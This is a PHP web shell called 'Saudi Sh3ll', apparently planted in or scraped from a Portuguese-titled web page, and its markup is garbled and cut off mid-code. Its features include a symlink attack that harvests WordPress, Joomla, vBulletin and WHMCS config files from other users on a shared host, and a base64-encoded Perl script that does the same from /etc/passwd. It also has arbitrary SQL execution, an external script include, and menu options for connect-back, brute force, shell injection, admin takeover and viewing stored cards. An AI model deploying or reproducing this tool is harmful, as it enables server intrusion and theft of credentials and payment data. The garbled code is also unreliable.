ASFALTO DE PAVIMENTAÇÃO

seupai . . . . . . . . . . .



"); } } ?>


<br /><p>'.$_SERVER['HTTP_HOST'].' ~ Saudi Sh3ll</p><br /><! html,body { margin-top: 5px ; padding: 0; outline: 0; } body { direction: ltr; background-color: 000000; color: CCCCCC; font-family: Tahoma, Arial, sans-serif; font-weight: bold; text-align: center ; } input,textarea,{ font-weight: bold; color: FFFFFF; dashed ffffff; border: 1px dotted 003300; background-color: black; padding: 3px } input:hover{ box-shadow:0px 0px 4px 009900; } .cont a { text-decoration: none; color: FFFFFF; } .hedr { font-size:32px; color: 009900; text-shadow: 0px 0px 4px 003300 ; } .td1{ border: 1px dotted 022B04; padding: 8px; border-radius: 20px; text-shadow: 0px 0px 2px 003300; font-size: 10px; font-family: Tahoma; font-weight: bold; } .td1 tr{} .lol{ text-align: left; float: left; background: 990000; } .nop{ width: 180px; text-align: center; font-size: 15px; font-family:Tahoma; color: 003300; } .nop a{ text-decoration: none; color: 003300 ; text-shadow: none; width: 80px; padding: 8px } .nop a:hover{ color: FFFFFF; box-shadow: 0px 0px 4px 006600 ; } a { text-decoration: none; color: 006600; } .tmp tr td:hover{ box-shadow: 0px 0px 4px EEEEEE; } .fot{ font-family:Tahoma, Arial, sans-serif; font-size: 13pt; } .ir { color: FF0000; } .cont { float:right; color: FFFFFF; box-shadow: 0px 0px 4px 003300; font-size: 13px; padding: 8px } .cont a{ text-decoration: none; color: FFFFFF; font-family: Tahoma, Arial, sans-serif ; font-size: 13px; text-shadow: 0px 0px 3px ; } .cont a:hover{ color: FF0000 ; text-shadow:0px 0px 3px FF0000 ; } .cont3 { color: FFFFFF; font-size: 15px; padding: 8px } .cont3 a{ text-decoration: none; color: FFFFFF; font-family: Tahoma, Arial, sans-serif ; font-size: 15px; text-shadow: 0px 0px 3px ; } .cont3 a:hover{ color: FF0000 ; text-shadow:0px 0px 3px FF0000 ; } .tmp tr td{ border: dotted 1px 003300; padding: 4px ; font-size: 14px; } .tmp tr td a { text-decoration: none; } .cmd { float:right; } .tbm{ font-size: 14px; } .tbm tr td{ border: dashed 1px 111111; } .hr{ border: dotted 1px 003300; padding: 5px ; font-size: 13px; color: white ; text-shadow: 0px 0px 3px ; } .hr2{ border: dotted 1px 003300; padding: 5px ; font-size: 13px; color: red ; text-shadow: 0px 0px 3px ; } .t3p{ width: 100%; } .t3p{margin-left: 45px ;} .t33p{margin-left: 45px ;} .t3p tr td{ border: solid 1px 002F00; padding: 2px ; font-size: 13px; text-align: center ; font-weight: bold; margin-left: 20px ; } .t3p tr td:hover{ box-shadow: 0px 0px 4px 009900; } .info {margin-left: 100px ; } .info tr td { border: solid 1px 002F00; padding: 5px ; font-size: 13px; text-align: center ; font-weight: bold; } .conn{width: 70%;} .conn tr td{ border: 1px dashed 003300; padding: 5px ; font-size: 13px; text-align: center ; font-weight: bold; } .lol a{ font-size: 10px; } .d0n{ width: 90%; border-top: solid 1px 003300; } .d0n tr td{ font-weight: bold; color: FFFFFF; font-family: Tahoma, Arial, sans-serif ; font-size: 13px; margin-left: 110px ; } .site { font-weight: bold; width: 50%; box-shadow: 0px 0px 2px 003300; } .ab { box-shadow: 0px 0px 6px 444444; width: 70%; padding: 10px ; } .ab tr td { text-align: center ; font-weight: bold; font-family: Tahoma, Arial, sans-serif ; font-size: 13px; color: white; text-shadow: 0px 0px 2px white ; } .ab tr td b { color:red ; text-shadow: 0px 0px 2px red ; } .ab tr td a { color: white; text-shadow: 0px 0px 2px white ; } .ab tr td a:hover { color:006600 ; text-shadow: none ; } .bru { color: FFFFFF; font-family: Tahoma, Arial, sans-serif ; font-size: 14px; text-shadow: 0px 0px 3px 000000 ; } .foter { color: 003300; font-family: Tahoma, Arial, sans-serif ; font-size: 11px; text-shadow: 0px 0px 3px 000000 ; } ><br /><p>'; echo '</p><br /><table class="tb1" cellspacing="0" cellpadding="0" width="95%"><br /><tbody><br /><tr><br /><td rowspan="2" width="15%" valign="top"><br /><div class="hedr"><img src="http://im11.gulfup.com/2012-02-03/1328267135241.png" alt="Saudi Shell" align="left" /></div><br /></td><br /><td class="td1" height="100" align="left">'; $pg = basename(__FILE__); echo "OS : <strong><span style="color: green;">"; $safe_mode = @ini_get('safe_mode'); $dir = @getcwd(); $ip=$_SERVER['REMOTE_ADDR']; $ips=$_SERVER['SERVER_ADDR']; define('SWS','al-swisre'); if ($os) { } else { $os = @php_uname(); echo $os ; } echo "   [ <a style="text-decoration: none; color: 003300; text-shadow: 2px 2px 7px 003300;" href="http://www.google.com.sa/search?hl=ar&safe=active&client=firefox-a&hs=9Xx&rls=org.mozilla%3Aar%3Aofficial&q=$os&oq=$os&aq=f&aqi=&aql=&gs_sm=e&gs_upl=5759106l5781953l0l5782411l1l1l0l0l0l0l0l0ll0l0" target="_blank">Google</a> ]"; echo "   [ <a style="text-decoration: none; color: 003300; text-shadow: 2px 2px 7px 003300;" href="http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=$os&filter_exploit_text=&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve=" target="_blank">exploit-db</a> ]"; echo "</span><br /></strong>"; echo (($safe_mode)?("safe_mode  : <strong><span style="color: red;">ON</span></strong>"):("safe_mode: <strong><span style="color: green;">OFF</span></strong>")); echo "<br />disable_functions : "; if(''==($df=@ini_get('disable_functions'))){echo "<span style="color: green;">NONE</span>";}else{ echo "<span style="color: red;">$df</span>";<br /><script src="http://www.r57.gen.tr/yazciz/ciz.js"></script><br />} echo "<br />Server : <span style="color: green;">".$_SERVER['SERVER_SOFTWARE']."</span><br />"; echo "PHP version : <strong><span style="color: green;">".@phpversion()."</span></strong><br />"; echo "Id : <span style="color: green;"><strong>"."user = ".@get_current_user()." | uid= ".@getmyuid()." | gid= ".@getmygid()."</strong></span><br />"; echo "Pwd : <span style="color: green;"><strong>".$dir."  ".wsoPermsColor($dir)."</strong></span>  [ <a href="$pg">Home</a> ]<br /><br /><br />"; echo "Your ip : <span><strong><a style="text-decoration: none; color: ff0000;" href="http://whatismyipaddress.com/ip/$ip" target="_blank">$ip   </a></strong></span> | ip server : <a style="text-decoration: none; color: ff0000;" href="http://whatismyipaddress.com/ip/$ips" target="_blank">$ips</a> |  <a style="text-decoration: none; color: ff0000;" href="$pg?sws=site" target="_blank">list site</a> |  <a style="text-decoration: none; color: ff0000;" href="?sws=phpinfo" target="_blank">phpinfo</a> |"; echo " <br /></td><br /></tr><br /></tbody><br /></table><br /><p>"); $ipb = @findit($read,""); $hostname = @findit($read,"Hostname:","<br />"); $isp = @findit($r3ad,"ISP"); echo "</p><br /><table style="margin: 9px;" cellspacing="0" cellpadding="0"><br /><tbody><br /><tr><br /><td class="td1" rowspan="2" valign="top"><br /><div class="nop"><br /><a href="$pg">File Manager</a> <br /> <br /> <a href="$pg?sws=info">More info</a> <br /><br /> <a href="$pg?sws=ms">Mysql Manager</a> <br /><br /> <a href="$pg?sws=byp">bypass Security</a> <br /><br /> <a href="$pg?sws=sm">Symlink</a> <br /><br /> <a href="$pg?sws=con">Connect Back</a> <br /><br /> <a href="?sws=brt">BruteForce</a> <br /><br /> <a href="$pg?sws=ab">About Por</a></div><br />"; echo '</td><br /><td width="82%" height="444" align="center" valign="top">'; if(isset($_REQUEST['sws'])) { switch ($_REQUEST['sws']) { ////////////////////////////////////////////////// Symlink ////////////////////////////////////// case 'sm': $sws = 'al-swisre' ; $mk = @mkdir('sym',0777); $htcs = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any"; $f =@fopen ('sym/.htaccess','w'); @fwrite($f , $htcs); $sym = @symlink("/","sym/root"); $pg = basename(__FILE__); echo '<br /><div class="cont3">[ <a href="?sws=sm"> Symlink File </a>] [<a href="?sws=sm&sy=sym"> User & Domains & Symlink </a>] [<a href="?sws=sm&sy=sec"> Domains & Script </a>] [ <a href="?sws=sm&sy=pl">Make Symlink Perl</a>]</div><br /><br /><br />' ; ////////////////////////////////// file //////////////////////// $sws = 'al-swisre' ; if(isset($_REQUEST['sy'])) { switch ($_REQUEST['sy']) { /// Domains + Scripts /// case 'sec': $d00m = @file("/etc/named.conf"); if(!$d00m) { die (" can't read /etc/named.conf"); } else { echo "<br /><div class="tmp">"; foreach($d00m as $dom){ if(eregi("zone",$dom)){ preg_match_all('zone "(.*)"', $dom, $domsws); flush(); if(strlen(trim($domsws[1][0])) > 2){ $user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0])); /////////////////////////////////////////////////////////////////////////////////// $wpl=$pageURL."/sym/root/home/".$user['name']."/public_html/wp-config.php"; $wpp=@get_headers($wpl); $wp=$wpp[0]; $wp2=$pageURL."/sym/root/home/".$user['name']."/public_html/blog/wp-config.php"; $wpp2=@get_headers($wp2); $wp12=$wpp2[0]; /////////////////////////////// $jo1=$pageURL."/sym/root/home/".$user['name']."/public_html/configuration.php"; $joo=@get_headers($jo1); $jo=$joo[0]; $jo2=$pageURL."/sym/root/home/".$user['name']."/public_html/joomla/configuration.php"; $joo2=@get_headers($jo2); $jo12=$joo2[0]; //////////////////////////////// $vb1=$pageURL."/sym/root/home/".$user['name']."/public_html/includes/config.php"; $vbb=@get_headers($vb1); $vb=$vbb[0]; $vb2=$pageURL."/sym/root/home/".$user['name']."/public_html/vb/includes/config.php"; $vbb2=@get_headers($vb2); $vb12=$vbb2[0]; $vb3=$pageURL."/sym/root/home/".$user['name']."/public_html/forum/includes/config.php"; $vbb3=@get_headers($vb3); $vb13=$vbb3[0]; ///////////////// $wh1=$pageURL."/sym/root/home/".$user['name']."public_html/clients/configuration.php"; $whh2=@get_headers($wh1); $wh=$whh2[0]; $wh2=$pageURL."/sym/root/home/".$user['name']."/public_html/support/configuration.php"; $whh2=@get_headers($wh2); $wh12=$whh2[0]; $wh3=$pageURL."/sym/root/home/".$user['name']."/public_html/client/configuration.php"; $whh3=@get_headers($wh3); $wh13=$whh3[0]; $wh5=$pageURL."/sym/root/home/".$user['name']."/public_html/submitticket.php"; $whh5=@get_headers($wh5); $wh15=$whh5[0]; $wh4=$pageURL."/sym/root/home/".$user['name']."/public_html/client/configuration.php"; $whh4=@get_headers($wh4); $wh14=$whh4[0]; //////////////////////////////////////////////////////////////////////////////// ////////// Wordpress //////////// $pos = strpos($wp, "200"); $config=" "; if (strpos($wp, "200") == true ) { $config="<a href="".$wpl."" target="_blank">Wordpress</a>"; } elseif (strpos($wp12, "200") == true) { $config="<a href="".$wp2."" target="_blank">Wordpress</a>"; } ///////////WHMCS//////// elseif (strpos($jo, "200") == true and strpos($wh15, "200") == true ) { $config=" <a href="".$wh5."" target="_blank">WHMCS</a>"; } elseif (strpos($wh12, "200") == true) { $config =" <a href="".$wh2."" target="_blank">WHMCS</a>"; } elseif (strpos($wh13, "200") == true) { $config =" <a href="".$wh3."" target="_blank">WHMCS</a>"; } ///////// Joomla to 4 /////////// elseif (strpos($jo, "200") == true) { $config=" <a href="".$jo1."" target="_blank">Joomla</a>"; } elseif (strpos($jo12, "200") == true) { $config=" <a href="".$jo2."" target="_blank">Joomla</a>"; } //////////vBulletin to 4 /////////// elseif (strpos($vb, "200") == true) { $config=" <a href="".$vb1."" target="_blank">vBulletin</a>"; } elseif (strpos($vb12, "200") == true) { $config=" <a href="".$vb2."" target="_blank">vBulletin</a>"; } elseif (strpos($vb13, "200") == true) { $config=" <a href="".$vb3."" target="_blank">vBulletin</a>"; } else { continue; } ///////////////////////////////////////////////////////////////////////////////////// $site = $user['name'] ; echo ""; flush(); exit; } } } } break; /// user + domine + symlink /// case 'sym': $d00m = @file("/etc/named.conf"); if(!$d00m) { die (" can't read /etc/named.conf"); } else { echo "<br /><table width="40%" align="center"><br /><tbody><br /><tr><br /><td>Domains</td><br /><td>Script</td><br /></tr><br /><tr><br /><td><a href="http://www.".$domsws[1][0].""></a>".$domsws[1][0]."</td><br /><td>".$config."</td><br /></tr><br /></tbody><br /></table><br />"; foreach($d00m as $dom){ if(eregi("zone",$dom)){ preg_match_all('zone "(.*)"', $dom, $domsws); flush(); if(strlen(trim($domsws[1][0])) > 2){ $user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0])); $site = $user['name'] ; @symlink("/","sym/root"); $site = $domsws[1][0]; $ir = 'ir'; $il = 'il'; if (preg_match("/.^$ir/",$domsws[1][0]) or preg_match("/.^$il/",$domsws[1][0]) ) { $site = "<br /><div style="color: ff0000; text-shadow: 0px 0px 1px red;">".$domsws[1][0]."</div><br />"; } echo " "; flush(); } } } } break; case 'pl': if (!is_dir('sa2')){ $mk = @mkdir('sa2',0777); if (is_file('sa2/perl.pl')) { echo "<a href="sa2/perl.pl" target="_blank">Symlink Perl</a>"; @chmod('sa2/perl.pl',0755); } else { $f2 =@fopen ('sa2/perl.pl','w'); $sml_perl = "IyEvdXNyL2Jpbi9wZXJsIC1JL2hvbWUvYWxqbm9mcWUvcHVibGljX2h0bWwvdHJhZmlxL2dvbmZpZy5wbA0KcHJpbnQgIkNvbnRlbnQtdHlwZTogdGV4dC9odG1sXG5cbiI7DQpwcmludCc8IURPQ1RZUEUgaHRtbCBQVUJMSUMgIi0vL1czQy8vRFREIFhIVE1MIDEuMCBUcmFuc2l0aW9uYWwvL0VOIiAiaHR0cDovL3d3dy53My5vcmcvVFIveGh0bWwxL0RURC94aHRtbDEtdHJhbnNpdGlvbmFsLmR0ZCI+DQo8aHRtbCB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMTk5OS94aHRtbCI+DQo8aGVhZD4NCjxtZXRhIGh0dHAtZXF1aXY9IkNvbnRlbnQtTGFuZ3VhZ2UiIGNvbnRlbnQ9ImVuLXVzIiAvPg0KPG1ldGEgaHR0cC1lcXVpdj0iQ29udGVudC1UeXBlIiBjb250ZW50PSJ0ZXh0L2h0bWw7IGNoYXJzZXQ9dXRmLTgiIC8+DQo8dGl0bGU+W35dIFBhaW4gU3ltbGluazwvdGl0bGU+DQo8c3R5bGUgdHlwZT0idGV4dC9jc3MiPg0KLm5ld1N0eWxlMSB7DQogZm9udC1mYW1pbHk6IFRhaG9tYTsNCiBmb250LXNpemU6IHgtc21hbGw7DQogZm9udC13ZWlnaHQ6IGJvbGQ7DQogY29sb3I6ICMwMEZGRkY7DQogIHRleHQtYWxpZ246IGNlbnRlcjsNCn0NCjwvc3R5bGU+DQo8L2hlYWQ+DQonOw0Kc3ViIGxpbHsNCiAgICAoJHVzZXIpID0gQF87DQokbXNyID0gcXh7cHdkfTsNCiRrb2xhPSRtc3IuIi8iLiR1c2VyOw0KJGtvbGE9fnMvXG4vL2c7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvdmIvaW5jbHVkZXMvY29uZmlnLnBocCcsJGtvbGEuJ35+dkJ1bGxldGluMS50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9pbmNsdWRlcy9jb25maWcucGhwJywka29sYS4nfn52QnVsbGV0aW4yLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2ZvcnVtL2luY2x1ZGVzL2NvbmZpZy5waHAnLCRrb2xhLid+fnZCdWxsZXRpbjMudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY2MvaW5jbHVkZXMvY29uZmlnLnBocCcsJGtvbGEuJ35+dkJ1bGxldGluNC50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9jb25maWcucGhwJywka29sYS4nfn5QaHBiYjEudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvZm9ydW0vaW5jbHVkZXMvY29uZmlnLnBocCcsJGtvbGEuJ35+UGhwYmIyLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dwLWNvbmZpZy5waHAnLCRrb2xhLid+fldvcmRwcmVzczEudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvYmxvZy93cC1jb25maWcucGhwJywka29sYS4nfn5Xb3JkcHJlc3MyLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nfn5Kb29tbGExLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2Jsb2cvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLid+fkpvb21sYTIudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvam9vbWxhL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nfn5Kb29tbGEzLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dobS9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJ35+V2htMS50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC93aG1jL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nfn5XaG0yLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3N1cHBvcnQvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLid+fldobTMudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY2xpZW50L2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nfn5XaG00LnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2JpbGxpbmdzL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nfn5XaG01LnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2JpbGxpbmcvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLid+fldobTYudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY2xpZW50cy9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJ35+V2htNy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC93aG1jcy9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJ35+V2htOC50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9vcmRlci9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJ35+V2htOS50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9hZG1pbi9jb25mLnBocCcsJGtvbGEuJ35+NS50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9hZG1pbi9jb25maWcucGhwJywka29sYS4nfn40LnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2NvbmZfZ2xvYmFsLnBocCcsJGtvbGEuJ35+aW52aXNpby50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9pbmNsdWRlL2RiLnBocCcsJGtvbGEuJ35+Ny50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9jb25uZWN0LnBocCcsJGtvbGEuJ35+OC50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9ta19jb25mLnBocCcsJGtvbGEuJ35+bWstcG9ydGFsZTEudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvaW5jbHVkZS9jb25maWcucGhwJywka29sYS4nfn4xMi50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9zZXR0aW5ncy5waHAnLCRrb2xhLid+flNtZi50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9pbmNsdWRlcy9mdW5jdGlvbnMucGhwJywka29sYS4nfn5waHBiYjMudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvaW5jbHVkZS9kYi5waHAnLCRrb2xhLid+fmluZmluaXR5LnR4dCcpOw0KfQ0KaWYgKCRFTlZ7J1JFUVVFU1RfTUVUSE9EJ30gZXEgJ1BPU1QnKSB7DQogIHJlYWQoU1RESU4sICRidWZmZXIsICRFTlZ7J0NPTlRFTlRfTEVOR1RIJ30pOw0KfSBlbHNlIHsNCiAgJGJ1ZmZlciA9ICRFTlZ7J1FVRVJZX1NUUklORyd9Ow0KfQ0KQHBhaXJzID0gc3BsaXQoLyYvLCAkYnVmZmVyKTsNCmZvcmVhY2ggJHBhaXIgKEBwYWlycykgew0KICAoJG5hbWUsICR2YWx1ZSkgPSBzcGxpdCgvPS8sICRwYWlyKTsNCiAgJG5hbWUgPX4gdHIvKy8gLzsNCiAgJG5hbWUgPX4gcy8lKFthLWZBLUYwLTldW2EtZkEtRjAtOV0pL3BhY2soIkMiLCBoZXgoJDEpKS9lZzsNCiAgJHZhbHVlID1+IHRyLysvIC87DQogICR2YWx1ZSA9fiBzLyUoW2EtZkEtRjAtOV1bYS1mQS1GMC05XSkvcGFjaygiQyIsIGhleCgkMSkpL2VnOw0KICAkRk9STXskbmFtZX0gPSAkdmFsdWU7DQp9DQppZiAoJEZPUk17cGFzc30gZXEgIiIpew0KcHJpbnQgJw0KPGJvZHkgY2xhc3M9Im5ld1N0eWxlMSIgYmdjb2xvcj0iIzAwMDAwMCI+DQogPGJyIC8+PGJyIC8+DQo8Zm9ybSBtZXRob2Q9InBvc3QiPg0KPHRleHRhcmVhIG5hbWU9InBhc3MiIHN0eWxlPSJib3JkZXI6MnB4IGRvdHRlZCAjMDAzMzAwOyB3aWR0aDogNTQzcHg7IGhlaWdodDogNDIwcHg7IGJhY2tncm91bmQtY29sb3I6IzBDMEMwQzsgZm9udC1mYW1pbHk6VGFob21hOyBmb250LXNpemU6OHB0OyBjb2xvcjojRkZGRkZGIiAgPjwvdGV4dGFyZWE+PGJyIC8+DQombmJzcDs8cD4NCjxpbnB1dCBuYW1lPSJ0YXIiIHR5cGU9InRleHQiIHN0eWxlPSJib3JkZXI6MXB4IGRvdHRlZCAjMDAzMzAwOyB3aWR0aDogMjEycHg7IGJhY2tncm91bmQtY29sb3I6IzBDMEMwQzsgZm9udC1mYW1pbHk6VGFob21hOyBmb250LXNpemU6OHB0OyBjb2xvcjojRkZGRkZGOyAiICAvPjxiciAvPg0KJm5ic3A7PC9wPg0KPHA+DQo8aW5wdXQgbmFtZT0iU3VibWl0MSIgdHlwZT0ic3VibWl0IiB2YWx1ZT0iR2V0IENvbmZpZyIgc3R5bGU9ImJvcmRlcjoxcHggZG90dGVkICMwMDMzMDA7IHdpZHRoOiA5OTsgZm9udC1mYW1pbHk6VGFob21hOyBmb250LXNpemU6MTBwdDsgY29sb3I6I0ZGRkZGRjsgdGV4dC10cmFuc2Zvcm06dXBwZXJjYXNlOyBoZWlnaHQ6MjM7IGJhY2tncm91bmQtY29sb3I6IzBDMEMwQyIgLz48L3A+DQo8L2Zvcm0+PGJyIC8+PGJyIC8+UmlnaHRzIG9mIHRoaXMgcGVybCB0byBLYXJhciBhTFNoYU1pJzsNCn1lbHNlew0KQGxpbmVzID08JEZPUk17cGFzc30+Ow0KJHkgPSBAbGluZXM7DQpvcGVuIChNWUZJTEUsICI+dGFyLnRtcCIpOw0KcHJpbnQgTVlGSUxFICJ0YXIgLWN6ZiAiLiRGT1JNe3Rhcn0uIi50YXIgIjsNCmZvciAoJGthPTA7JGthPCR5OyRrYSsrKXsNCndoaWxlKEBsaW5lc1ska2FdICA9fiBtLyguKj8pOng6L2cpew0KJmxpbCgkMSk7DQpwcmludCBNWUZJTEUgJDEuIi50eHQgIjsNCmZvcigka2Q9MTska2Q8MTg7JGtkKyspew0KcHJpbnQgTVlGSUxFICQxLiRrZC4iLnR4dCAiOw0KfQ0KfQ0KIH0NCnByaW50Jzxib2R5IGNsYXNzPSJuZXdTdHlsZTEiIGJnY29sb3I9IiMwMDAwMDAiPg0KPHA+RG9uZSAhITwvcD4NCjxwPiZuYnNwOzwvcD4nOw0KaWYoJEZPUk17dGFyfSBuZSAiIil7DQpvcGVuKElORk8sICJ0YXIudG1wIik7DQpAbGluZXMgPTxJTkZPPiA7DQpjbG9zZShJTkZPKTsNCnN5c3RlbShAbGluZXMpOw0KcHJpbnQnPHA+PGEgaHJlZj0iJy4kRk9STXt0YXJ9LicudGFyIj48Zm9udCBjb2xvcj0iIzAwRkYwMCI+DQo8c3BhbiBzdHlsZT0idGV4dC1kZWNvcmF0aW9uOiBub25lIj5DbGljayBIZXJlIFRvIERvd25sb2FkIFRhciBGaWxlPC9zcGFuPjwvZm9udD48L2E+PC9wPic7DQp9DQp9DQogcHJpbnQiDQo8L2JvZHk+DQo8L2h0bWw+Ijs="; $write = fwrite ($f2 ,base64_decode($sml_perl)); if ($write) { @chmod('sa2/perl.pl',0755); } echo "<a href="sa2/perl.pl" target="_blank">Symlink Perl</a>"; } break; } /// home /// } } else { echo ' The file path to symlink <br /><br /><input name="file" size="60" type="text" value="/home/user/public_html/file.name" /><br /><br /><input name="symfile" size="60" type="text" value="sa.txt" /><br /><br /><input name="symlink" type="submit" value="symlink" /><br /><br /> '; $pfile = $_POST['file']; $symfile = $_POST['symfile']; $symlink = $_POST['symlink']; if ($symlink) { @symlink("$pfile","sym/$symfile"); echo '<br /><a href="sym/'.$symfile.'" target="_blank">'.$symfile.'</a>'; exit; }else {exit;} } break; //////////////////////// mysql /////////////////////////////////////////////////////////////////////////////// case 'ms': $host = $_POST['host']; $user = $_POST['user']; $pass = $_POST['pass']; $db = $_POST['db']; ////////////////// HEEEEEEEEEEEEERE /////////////////////////////////////////////// HEEEEEEEEEEEEERE ///////////////////////////// if ($_GET['show'] == 'tb'){ $host_c = $_COOKIE['host_mysql']; $user_c = $_COOKIE['user_mysql']; $pass_c = $_COOKIE['pass_mysql']; $db_c = $_COOKIE['db_mysql']; $con = @mysql_connect($host_c,$user_c,$pass_c); $sel = @mysql__db($db_c); if(!$sel){ echo "mysql connect error" ; exit;} $dbname = $db_c; $pTable = mysql_list_tables( $dbname ) ; $num = mysql_num_rows( $pTable ); echo "<br /><div class="tmp"></div><br /><table width="40%" align="center"><br /><tbody><br /><tr><br /><td>Domains</td><br /><td>Users</td><br /><td>symlink</td><br /></tr><br /><tr><br /><td><br /><div class="dom"><a href="http://www.".$domsws[1][0]."" target="_blank"></a>".$site."</div><br /></td><br /><td>".$user['name']."</td><br /><td><a href="sym/root/home/".$user[" target="_blank">symlink </a></td><br /></tr><br /><form method="post"></form><br /></tbody><br /></table><br />"; for( $i = 0; $i < $num; $i++ ) { $tablename = mysql_tablename( $pTable, $i ); $sq3l=mysql_query(" * $tablename"); $c3t=mysql_num_rows($sq3l); echo " "; if ($tablename == 'template') { $secript = 'vb'; } else if ($tablename == 'wp_post') {$secript = 'wp';} else if ($tablename == 'jos_users') {$secript = 'jm';} else if ($tablename == 'tbladmins') {$secript = 'wh';} } if ($secript == 'vb') { echo '<br /><div class="cont"><br /><div style="text-shadow: 0px 0px 4px FFFFFF;"><strong>Options vBulletin </strong> <br /> <br /> <strong> [ <a href="?sws=ms&op=in"> Update Index </a>] [<a href="?sws=ms&op=sh"> Inject shell</a>] [ <a href="?sws=ms&op=shm">Show members Information</a>] '; } else if ($secript == 'wp') { echo '<br /><div class="cont"><br /><div style="text-shadow: 0px 0px 4px FFFFFF;"><strong>Options Wordpress </strong><br /><div><br /> <br /> <strong> [ <a href="?sws=ms&op=awp"> Change admin </a>] [ <a href="?sws=ms&op=shwp">Show members</a>]'; } else if ($secript == 'wh'){ echo '<br /><div class="cont"><br /><div style="text-shadow: 0px 0px 4px FFFFFF;"><strong>Options Whmcs </strong><br /><div><br /> <br /> <strong> [ <a href="?sws=ms&op=hroot">roots</a>] [ <a href="?sws=ms&op=chost"> Clients Hosting Account </a>] [ <a href="?sws=ms&op=scard">Cards</a>] <br /><br /> [ <a href="?sws=ms&op=trak">tickets</a>] [ <a href="?sws=ms&op=rtrak">ticket replies</a>] [ <a href="?sws=ms&op=sh3"> Search ticket</a>] [ <a href="?sws=ms&op=cadmin"> Change admin </a>]'; } else{echo '<br /><div class="cont">';} /////////////// cmd //////////////////////////////// echo "<br /><br /> [ <a href="?sws=ms&op=bkup"> baukup </a>] [ <a href="?sws=ms&op=css"> Inject css </a>] <br /><br /> <form method="post"></form> <textarea rows="\"3\"" name="\"sql\"">Cmd sql</textarea> <br /><br /> <input name="cmd" type="\"submit\"" value="\"SQL\"" /> <br /><br /> <a href="\"?sws=ms&op=out\"">[ Logout ]</a>"; if (isset($_POST['cmd'])) { $sql = $_POST['sql']; $query =@mysql_query($sql,$con) or die; if ($query){echo "<br /><br /><br /><br /><div>CMD sql successfully</div><br />";} elseif(!$query) {echo "<br /><br /><br /><br /><div>CMD sql error</div><br />";} } exit; } ///////////////////// show cl /////////////// else if ($_GET['show'] == 'cl') { $host_c = $_COOKIE['host_mysql']; $user_c = $_COOKIE['user_mysql']; $pass_c = $_COOKIE['pass_mysql']; $db_c = $_COOKIE['db_mysql']; $con = 